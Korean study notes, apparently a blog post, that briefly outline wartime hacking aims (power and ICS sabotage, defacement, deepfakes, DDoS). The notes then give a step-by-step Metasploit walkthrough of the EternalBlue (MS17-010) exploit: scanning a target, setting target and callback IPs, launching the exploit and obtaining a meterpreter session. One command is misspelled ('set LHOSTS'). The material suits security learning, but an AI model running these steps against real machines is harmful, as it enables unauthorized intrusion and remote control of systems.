해킹 기법 - Metasploit

전쟁에 있어 해킹이란

(1) 시스템 파괴

=> 전력 시스템

ICS 댐, 화력발전소, 수력발전소,

전력 시설.

 

(2) 심리전

=> Deface 공격 (일반 웹 사이트 대상으로)

=> Deepfake

 

(3) 디도스

전쟁에서 해킹.

 

-- 우크라 IT군

 

---

Metasploit

정말 강력한 해킹 툴.

 

eternalblue

 

칼리 리눅스에 들어가 

search eternalblue

라고 치면 관련된 모듈이 주루룩 나온다

 

그 중, smb_ms17_010 을 

 

use auxiliary/scanner/smb/smb_ms17_010

라거나 use [ 해당 번호 ] 라고 치면 해당 모듈이 '장착' 된다.

 

show options

라고 하면 어떤 옵션을 넣어야 하는지 required인지를 확인할 수 있다.

 

 

저렇게 확인했을 때 Required 항목이 yes인데 Setting이 비어있는 곳을 찾아서 채워넣는다.

해당 예시에서는 RHOSTS가 비어져 있으므로 세팅을 다음과 같이 할 수 있다.

 

set RHOSTS "공격할 대상 ip"

그 후,

exploit

또는 run 이라고 입력하면 됨

 

그럼 공격했을 때 VULNERABLE하다고 (취약하다고) 나온다.

 

 

여기까지 하면 이제 총이 준비되었다. 하지만 아직 총알이 없다.

 

search eternalblue

 

로 이제 실제 공격 준비를 해보자

첫 번째 모듈을 선택한다

 

use ms17_010_eternalblue

 

 

똑같이 RHOSTS를 세팅한다.

 

하지만 이 공격은 리버스 쉘처럼 LHOST (본인의 ip)도 설정을 해줘야 한다.

 

set LHOSTS "본인의 ip"

 

 

이제 exploit을 누르고 차분히 기다리기만 하면 공격이 실행된다

 

성공하면 이런 알림이 뜬다

 

그럼 이제 meterpreter 라는 게 뜰텐데, 이건 해킹을 위한 엄청 유용한 툴이다

 

help 명령어를 입력하면 수많은 Command를 알려준다